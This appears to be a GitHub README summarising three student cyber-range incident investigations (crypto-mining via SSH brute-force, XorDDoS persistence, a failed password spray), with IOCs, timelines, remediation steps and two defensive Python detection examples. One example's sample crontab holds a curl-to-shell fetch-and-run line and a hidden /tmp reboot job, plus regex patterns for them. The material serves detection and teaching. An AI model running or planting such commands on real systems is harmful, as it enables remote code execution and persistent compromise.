SancLogic/SOC-Cyber-Range-Investigations

SOC Cyber Range Investigations

Real-world threat activity investigated through hands-on detection and response inside a student cyber range environment.


  • Reports/ – Full Incident Reports
  • Iocs/ – IOC Lists Extracted
  • Detections/ – KQL Rules/Alerts (Coming Soon)

Incident Library

Incident-2400: Azure Abuse – Crypto-Mining & Brute-Force


Incident-2401: Linux VM Compromise – XorDDoS Malware


Incident-2402: Password Spray (No Compromise)

Incident 2400 Summary

Incident 2400 – Azure Abuse, Crypto-Mining & Brute-Force

Incident ID: 2400
Date Investigated: March 18, 2025
Environment: LOG(N) Pacific | Cyber Range


A suspicious Azure abuse report led to the discovery of crypto-mining and external brute-force attacks originating from internal lab VMs. The attacker exploited weak SSH credentials, deployed miner payloads, and used compromised systems to launch outbound brute-force attacks to external services.


  • Initial compromised host: linux-vulnmgmt-kobe
  • Laterally moved to: levi-linux-vulnerability, sakel-lunix-2
  • External targets included YouTube, Twitter, etc.

  • Miner binaries: .diicot, .balu, .bisis
  • Downloaded via wget and curl
  • 240K+ outbound brute-force attempts via SSH

  • Initial compromise: Feb 18, 2025
  • Mining activity: Feb 20–22
  • Outbound abuse: Mar 14–17

  • Internal lab: Azure-hosted Linux VMs
  • Public IP involved: 20.81.228.191

  • Crypto-mining for financial gain
  • Platform abuse through brute-force
  • No outbound egress restrictions + weak SSH creds

  • The attacker gained entry through brute-force attacks that succeeded because of weak credentials
  • They hid their activity using scripts and scheduled tasks

  1. Secure Remote Access
    Limit who can connect to systems remotely and require strong, unique passwords or authentication methods.

  2. Block Malicious Traffic
    Prevent compromised systems from connecting to known hacker servers or mining networks by controlling outbound network traffic.

  3. Update Credentials
    Immediately change all passwords on affected systems and avoid using shared or reused credentials going forward.

  4. Monitor for Suspicious Behavior
    Set up security alerts to catch unusual logins or hidden programs that could signal another attack.

  5. Clean Up and Reset
    Remove all infected systems, restore from clean backups, and do not reuse compromised virtual machines or images.


Date        Event
Feb 18      Attacker gained access via weak credentials
Feb 20–22   Crypto-mining tools installed and active
Mar 14–17   Outbound brute-force attacks launched
Mar 18      Microsoft abuse alert triggered
Mar 20      Incident fully contained and cleaned

Incident 2401 Summary

Incident 2401 – Linux VM Compromise: XorDDoS Malware

Incident ID: 2401
Date Investigated: March 24, 2025
Environment: LOG(N) Pacific | Cyber Range


A Linux VM exposed to the internet was compromised through brute-force SSH attacks. The attacker deployed XorDDoS malware, maintained access over time using hidden cron jobs and SSH keys, and communicated with a known command-and-control (C2) server. Attempts were also made to move laterally and hide their presence using renamed system binaries.


  • Compromised host: jr-linux-vm-test
  • Attacker used public SSH scanning infrastructure
  • C2 IP observed: 169.239.130.12

  • Malware: XorDDoS variant deployed post-compromise
  • Persistence via cron jobs, fake system binaries
  • C2 communication and botnet control attempts

  • Initial access: Jan 30 – Feb 28, 2025
  • Malware activity re-detected: Mar 24, 2025
  • Previous cleanup done: Mar 18–20

  • Azure-hosted VM: jr-linux-vm-test
  • C2 communication over HTTP (port 80)
  • External origin IPs associated with botnet activity

  • Maintain access for malware deployment and system abuse
  • Resource hijacking (CPU/traffic) and possible lateral movement
  • Weak SSH configuration enabled multiple compromises

  • Gained root access via SSH brute-force
  • Injected SSH keys and set up malicious cron jobs
  • Used renamed Linux binaries to evade detection
  • Connected to known XorDDoS C2 infrastructure

  1. Harden SSH Access
    Restrict access to known IPs and use key-based authentication.

  2. Rotate Credentials
    Change all passwords and keys, especially for root and shared users.

  3. Rebuild Systems
    Don’t reuse infected machines; delete the VMs.

  4. Block Malicious Infrastructure
    Use threat intel to block known C2 servers like 169.239.130.12.

  5. Increase Monitoring
    Watch for signs of persistence (cron jobs, SSH key changes, renamed binaries).


Date        Event
Jan 30      Initial SSH brute-force compromise
Feb–Mar     Dormant persistence (no alerts)
Mar 18–20   Cleanup attempt performed
Mar 24      Malware re-detected and C2 communication observed
Mar 25      Host isolated and deleted
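The "Increase Monitoring" recommendation above lists three persistence indicators seen in this incident: malicious cron jobs, injected SSH keys, and renamed system binaries. The following is an added example of how a host-side audit for those three indicators can be written; it is not code from this repository, and every input in it (the crontab, the authorized_keys entries, the "binary" contents, the allowlist of known keys, and the addresses) is constructed for illustration, not taken from the incident.

```python
"""Audit a Linux host for the persistence indicators listed in the Incident 2401
summary: cron jobs that fetch-and-run remote content or run from temp/hidden paths,
SSH keys not on an allowlist, and binaries whose hash differs from a clean image.
Added illustration with constructed inputs; not the repository's own tooling."""
import hashlib
import re

# ---- Constructed inputs (not from the incident) -------------------------------
# A root crontab after tampering: one legitimate job plus two entries of the kind
# the summary describes. The IP is a documentation address, not a real C2.
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/3 * * * * curl -s http://198.51.100.23/x.sh | sh
@reboot /tmp/.hidden/update
"""

# root's authorized_keys: one key the admin team recognises, one it does not.
AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyMaterial admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCUnknownKeyMaterial root@unknown
"""
KNOWN_KEYS = {("ssh-ed25519", "AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyMaterial")}

# Stand-ins for file contents: what the clean image holds vs. what the host holds now.
CLEAN_IMAGE = {"/usr/bin/ps": b"clean ps", "/usr/bin/ss": b"clean ss",
               "/usr/bin/netstat": b"clean netstat"}
CURRENT_HOST = {"/usr/bin/ps": b"clean ps", "/usr/bin/ss": b"replaced ss",
                "/usr/bin/netstat": b"clean netstat", "/usr/bin/.sshd": b"extra"}

# curl/wget output piped straight into a shell; temp or dot-directory paths.
REMOTE_EXEC = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|da)?sh\b")
SUSPICIOUS_PATH = re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/|/\.[A-Za-z0-9_-]+")


def audit_cron(text):
    """Return cron entries (with reasons) that match either persistence pattern."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if REMOTE_EXEC.search(line):
            reasons.append("fetches and executes remote content")
        if SUSPICIOUS_PATH.search(line):
            reasons.append("runs from temp or hidden path")
        if reasons:
            findings.append({"line": line, "reasons": reasons})
    return findings


def audit_authorized_keys(text, known):
    """Return entries whose (key type, key blob) is not in the known set."""
    unknown = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith("#"):
            continue
        # Entries with an options prefix (command="...", from="...") would shift the
        # fields; this example assumes plain "type blob comment" lines.
        key_type, blob = parts[0], parts[1]
        comment = parts[2] if len(parts) > 2 else ""
        if (key_type, blob) not in known:
            unknown.append({"type": key_type, "comment": comment,
                            "blob_sha256": hashlib.sha256(blob.encode()).hexdigest()[:16]})
    return unknown


def sha256_map(files):
    """Map each path to the SHA-256 of its contents."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def audit_binaries(current, baseline):
    """Compare current hashes against the clean-image baseline."""
    findings = []
    for path, digest in sorted(current.items()):
        if path not in baseline:
            findings.append({"path": path, "reason": "not in baseline"})
        elif baseline[path] != digest:
            findings.append({"path": path, "reason": "hash differs from baseline"})
    return findings


def run_audit():
    """Run all three checks over the constructed inputs."""
    return {
        "cron": audit_cron(CRONTAB),
        "ssh_keys": audit_authorized_keys(AUTHORIZED_KEYS, KNOWN_KEYS),
        "binaries": audit_binaries(sha256_map(CURRENT_HOST), sha256_map(CLEAN_IMAGE)),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(run_audit(), indent=2))
```

The binary check deliberately hashes against a baseline taken from the clean image rather than looking for known-bad names: a renamed or replaced system binary keeps a legitimate-looking path, so only a content comparison (or a package manager's verify mode) exposes it. The cron and key checks are allowlist-style for the same reason; anything not explicitly expected is surfaced for a human to review.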

Incident 2402 Summary

Incident 2402 – Password Spray Attempt (No Compromise)

Incident ID: 2402
Date Investigated: March 30, 2025
Environment: LOG(N) Pacific | Cyber Range


A high-severity alert flagged suspicious logon activity targeting an internet-facing lab VM. Investigation confirmed a password spray attempt from external IPs, focused on the built-in guest account. No successful authentication or system compromise occurred. The device was not enrolled in endpoint protection and was publicly exposed at the time of the attack.


  • Targeted device: finallabscott
  • Attacker IPs from: China, Russia, and global scanning infrastructure
  • Account targeted: guest (built-in, enabled)

  • Password spray attack (1,000+ failed attempts)
  • Attempted remote login via "Network Logon"
  • No successful authentication or shell activity observed

  • Alert triggered: Mar 29, 2025
  • Logs reviewed: Mar 23–30, 2025

  • Device: finallabscott
  • Exposure: Internet-facing with no Defender for Endpoint
  • Remote IPs: 218.92.0.186, 5.178.87.180 (VT: known scanners)

  • External actors targeting public systems with weak/default credentials
  • Guest account was accessible and lacked protections
  • Likely part of a mass credential stuffing campaign

  • Automated spray tools attempted login to guest account
  • No lateral movement, persistence, or malware seen
  • Failed authentication logs confirmed across multiple time windows

  1. Disable Unused Accounts
    Remove or disable default/guest accounts across all VMs.

  2. Limit Exposure
    Avoid exposing unmanaged devices directly to the internet.

  3. Enable Endpoint Protection
    Enroll all devices in Defender for Endpoint or equivalent tools.

  4. Geo-Block Suspicious IPs
    Block known malicious ranges from untrusted regions where possible.

  5. Enforce Lockout Policies
    Implement lockout after failed login attempts to prevent enumeration.


Date        Event
Mar 23–29   Multiple failed logons targeting guest
Mar 29      Alert triggered by Sentinel (Password Spray)
Mar 30      Incident triaged, no compromise confirmed
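Two of the incidents above are the same pattern seen from opposite directions: Incident 2402 is a burst of failed network logons from external IPs against one account that never succeeded, while Incident 2400 began with failed SSH logons that did succeed and then turned the host into a source of outbound SSH brute-force against many external destinations. The repository's KQL detections are listed as coming soon; the block below is an added example, not the repository's code, showing both detections as plain threshold logic over constructed logon and flow records. The field layouts, the thresholds, the 10-minute window, the internal address ranges, and all sample IPs (documentation ranges) are assumptions of this example; the host names are the ones the summaries name, but the events attached to them are made up.

```python
"""Sliding-window detection for (a) failed-logon bursts from one remote IP, marking
whether the same IP later succeeded, and (b) one internal host opening SSH to many
distinct external destinations (outbound brute-force). Constructed data throughout."""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"
WINDOW = timedelta(minutes=10)
FAIL_THRESHOLD = 5      # failed logons from one remote IP inside WINDOW (assumed)
FANOUT_THRESHOLD = 5    # distinct external SSH destinations from one host (assumed)
# The lab's internal ranges (an assumption). ip_address(...).is_private is not used
# because it also classifies the documentation ranges in the sample data as non-public.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _ts(s):
    return datetime.strptime(s, FMT)


def _burst(start, count, step_s, host, account, ip, result="Failed"):
    """Constructed logon records: (time, host, account, remote_ip, logon_type, result)."""
    t0 = _ts(start)
    return [((t0 + timedelta(seconds=i * step_s)).strftime(FMT), host, account, ip, "Network", result)
            for i in range(count)]


# Constructed sample: a spray against guest with no success (the Incident 2402 shape),
# a short burst against root that ends in a success (the Incident 2400 entry shape),
# and two mistyped passwords from an internal workstation that should not alert.
LOGONS = (
    _burst("2025-03-29 01:00:00", 6, 30, "finallabscott", "guest", "198.51.100.7")
    + _burst("2025-02-18 14:00:00", 5, 10, "linux-vulnmgmt-kobe", "root", "203.0.113.9")
    + _burst("2025-02-18 14:00:50", 1, 0, "linux-vulnmgmt-kobe", "root", "203.0.113.9", "Success")
    + _burst("2025-03-29 09:00:00", 2, 5, "finallabscott", "analyst", "10.0.0.5")
)

# Constructed flow records: (time, source_host, dest_ip, dest_port).
FLOWS = (
    [(f"2025-03-14 03:00:{i * 5:02d}", "linux-vulnmgmt-kobe", f"203.0.113.{10 + i}", 22) for i in range(6)]
    + [("2025-03-14 03:00:40", "linux-vulnmgmt-kobe", "10.0.0.20", 22)]  # internal hop, ignored
    + [("2025-03-14 03:01:00", "levi-linux-vulnerability", "198.51.100.50", 22),
       ("2025-03-14 03:01:10", "levi-linux-vulnerability", "198.51.100.51", 443)]
)


def detect_logon_bursts(events, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Per remote IP: the largest number of failed logons inside a sliding window, and
    whether that IP ever logged on successfully. Failures followed by a success from
    the same source is the signature of a brute-force that worked."""
    by_ip = defaultdict(list)
    for ts, host, account, ip, _logon_type, result in events:
        by_ip[ip].append((_ts(ts), host, account, result))
    findings = []
    for ip, evs in by_ip.items():
        failures = sorted(e for e in evs if e[3] == "Failed")
        best, start = 0, 0
        for end in range(len(failures)):
            while failures[end][0] - failures[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        findings.append({
            "remote_ip": ip,
            "hosts": sorted({e[1] for e in failures}),
            "accounts": sorted({e[2] for e in failures}),
            "max_failures_in_window": best,
            "compromise_suspected": any(e[3] == "Success" for e in evs),
        })
    return sorted(findings, key=lambda f: f["remote_ip"])


def detect_outbound_ssh_fanout(flows, threshold=FANOUT_THRESHOLD, window=WINDOW):
    """Per internal host: distinct external SSH destinations inside a sliding window.
    One host reaching many unrelated SSH servers within minutes is the shape of
    outbound brute-force, whether or not any of those logons succeeded."""
    by_host = defaultdict(list)
    for ts, host, dst_ip, dst_port in flows:
        addr = ipaddress.ip_address(dst_ip)
        if dst_port == 22 and not any(addr in net for net in INTERNAL_NETS):
            by_host[host].append((_ts(ts), dst_ip))
    findings = []
    for host, conns in by_host.items():
        conns.sort()
        for i, (t0, _) in enumerate(conns):
            targets = {ip for t, ip in conns[i:] if t - t0 <= window}
            if len(targets) >= threshold:
                findings.append({"host": host, "distinct_targets": len(targets),
                                 "window_start": t0.strftime(FMT)})
                break
    return findings


if __name__ == "__main__":
    for finding in detect_logon_bursts(LOGONS) + detect_outbound_ssh_fanout(FLOWS):
        print(finding)
```

The `compromise_suspected` flag is what separates the two incidents in triage: Incident 2402 produces a burst with the flag clear (alert, confirm no success, harden the guest account), while the Incident 2400 pattern produces a burst with the flag set, which should be treated as a confirmed intrusion rather than noise. The outbound check needs flow or firewall logs rather than logon logs, which is why the summary's "Block Malicious Traffic" recommendation (egress control) is also what gives you the telemetry to detect this.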

About

Reports, detections, and simulations from SOC lab investigations and cyber range exercises using Sentinel, Defender, KQL, and Azure.
